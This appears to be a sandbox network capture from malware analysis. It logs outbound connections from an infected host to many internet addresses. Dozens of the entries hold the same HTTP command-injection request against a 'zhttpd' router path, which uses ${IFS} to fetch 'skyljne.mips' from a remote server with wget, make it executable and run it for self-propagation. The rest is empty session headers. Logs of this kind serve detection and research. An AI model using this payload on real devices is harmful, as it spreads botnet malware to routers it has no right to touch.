                                          Jan 14, 2024 15:46:37.491831064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9619192.168.2.2334818111.89.59.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491888046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9620192.168.2.234526096.172.195.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491920948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9621192.168.2.235774080.129.209.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491961002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9622192.168.2.233300614.225.98.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.491993904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9623192.168.2.233953666.97.56.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492058992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9624192.168.2.2339210196.113.80.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492083073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9625192.168.2.2357674179.13.142.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492141008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9626192.168.2.2353450104.238.148.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492172956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9627192.168.2.235737614.92.223.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492224932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9628192.168.2.2342598150.54.217.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492248058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9629192.168.2.23515585.200.54.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492300034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9630192.168.2.23398304.7.88.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492340088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9631192.168.2.2333886138.49.44.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492400885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9632192.168.2.2357902138.118.231.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492434025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9633192.168.2.2359944133.223.84.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492460012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9634192.168.2.2345676185.151.86.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492491961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9635192.168.2.235575478.107.2.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492548943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9636192.168.2.2334436217.206.131.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492609978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9637192.168.2.234392849.19.209.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492666960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9638192.168.2.234425251.3.0.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492721081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9639192.168.2.2342632139.206.78.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492786884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9640192.168.2.2360864135.132.89.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492839098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9641192.168.2.235599244.134.218.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492863894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9642192.168.2.233286476.122.196.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492923975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9643192.168.2.2334632197.29.244.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.492965937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9644192.168.2.233572292.72.12.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.493020058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9645192.168.2.2343674164.102.2.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.493057013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9646192.168.2.234818869.255.173.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.493102074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9647192.168.2.234612272.108.114.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9648192.168.2.2353866100.180.216.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9649192.168.2.233313645.254.174.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9650192.168.2.2351550110.198.59.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9651192.168.2.2341678217.129.1.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9652192.168.2.235283019.48.137.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9653192.168.2.233383684.47.57.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9654192.168.2.233479671.211.109.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9655192.168.2.234364248.176.149.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9656192.168.2.235750472.237.184.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9657192.168.2.2343166173.153.128.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9658192.168.2.235355669.254.28.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9659192.168.2.233714675.6.81.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9660192.168.2.2340260181.59.167.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9661192.168.2.2344588143.98.128.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9662192.168.2.2336478193.235.58.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9663192.168.2.2346918103.108.88.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9664192.168.2.2358362181.254.65.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9665192.168.2.2351210133.133.77.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9666192.168.2.2342810213.7.67.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9667192.168.2.2355042160.38.28.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9668192.168.2.2348090200.178.18.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9669192.168.2.2357088196.135.202.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9670192.168.2.2339528133.132.107.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9671192.168.2.233330431.81.176.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9672192.168.2.2340394199.169.191.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9673192.168.2.235404645.203.248.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9674192.168.2.2346584137.43.18.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9675192.168.2.2355802158.128.106.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9676192.168.2.2343094222.90.103.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9677192.168.2.235211690.136.148.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9678192.168.2.234865239.51.226.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9679192.168.2.2344622142.98.231.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9680192.168.2.2352210126.85.96.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9681192.168.2.234432431.185.52.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9682192.168.2.2349846209.57.244.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9683192.168.2.234969462.226.170.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9684192.168.2.2355674172.202.78.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9685192.168.2.233719064.83.24.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9686192.168.2.234189268.107.223.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9687192.168.2.2348412196.231.29.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9688192.168.2.2353218220.143.250.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9689192.168.2.2349856198.215.40.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9690192.168.2.2336920205.96.186.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9691192.168.2.2345270168.57.137.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9692192.168.2.235360242.126.195.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9693192.168.2.234633699.54.141.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9694192.168.2.2347666131.221.107.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9695192.168.2.2351742147.59.115.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9696192.168.2.234373646.223.20.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9697192.168.2.234288675.48.105.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9698192.168.2.2347928122.22.240.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9699192.168.2.2356832134.225.87.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9700192.168.2.234945448.181.159.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9701192.168.2.2338142222.235.224.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9702192.168.2.2340256146.101.178.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9703192.168.2.235121843.227.44.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9704192.168.2.2333666201.197.209.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9705192.168.2.2344690223.17.219.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9706192.168.2.2335140172.35.226.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9707192.168.2.2335130124.61.209.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9708192.168.2.234176250.52.13.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9709192.168.2.233278232.121.177.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9710192.168.2.2352032182.124.154.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9711192.168.2.234645049.10.218.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9712192.168.2.2341620150.188.74.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9713192.168.2.235706645.131.99.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9714192.168.2.235050288.130.116.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9715192.168.2.234982880.21.232.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9716192.168.2.235832039.55.27.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9717192.168.2.233568627.215.15.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9718192.168.2.2359126185.222.90.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9719192.168.2.2343310194.7.18.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9720192.168.2.2343360192.64.173.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9721192.168.2.2336512141.105.252.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9722192.168.2.233591624.223.100.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9723192.168.2.23544408.137.121.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9724192.168.2.235666217.233.187.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9725192.168.2.2342626116.185.164.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9726192.168.2.2346890174.55.149.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9727192.168.2.23442989.13.9.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9728192.168.2.2337006109.62.42.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9729192.168.2.235714478.130.87.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9730192.168.2.234753487.152.155.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9731192.168.2.233455294.138.84.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9732192.168.2.2345482156.226.81.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9733192.168.2.2334432175.170.87.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9734192.168.2.233475617.81.217.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9735192.168.2.2344028209.219.111.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9736192.168.2.235034442.174.26.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9737192.168.2.233646854.164.222.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9738192.168.2.233898497.117.85.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9739192.168.2.2351412205.218.134.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9740192.168.2.2342154180.165.248.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9741192.168.2.2339868113.116.131.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9742192.168.2.236038654.30.121.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9743192.168.2.2344516183.253.53.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9744192.168.2.234234027.49.22.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9745192.168.2.235736261.151.179.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9746192.168.2.2350412189.143.242.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9747192.168.2.2360534147.117.106.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9748192.168.2.2335272222.78.80.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9749192.168.2.2356692125.152.236.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9750192.168.2.2341586147.207.164.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9751192.168.2.2348074163.147.253.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9752192.168.2.2335962209.189.161.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9753192.168.2.2334642178.39.172.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9754192.168.2.233703291.215.134.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9755192.168.2.234398287.151.70.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9756192.168.2.2345802195.149.20.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9757192.168.2.234254068.48.105.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9758192.168.2.2351718124.229.102.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9759192.168.2.2342774120.71.108.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9760192.168.2.234170082.18.24.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9761192.168.2.2345066107.154.219.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9762192.168.2.2360494133.245.235.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9763192.168.2.2360878209.83.180.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9764192.168.2.235945841.224.18.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9765192.168.2.2333514166.152.188.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9766192.168.2.2348744118.122.246.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9767192.168.2.2337292121.37.223.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
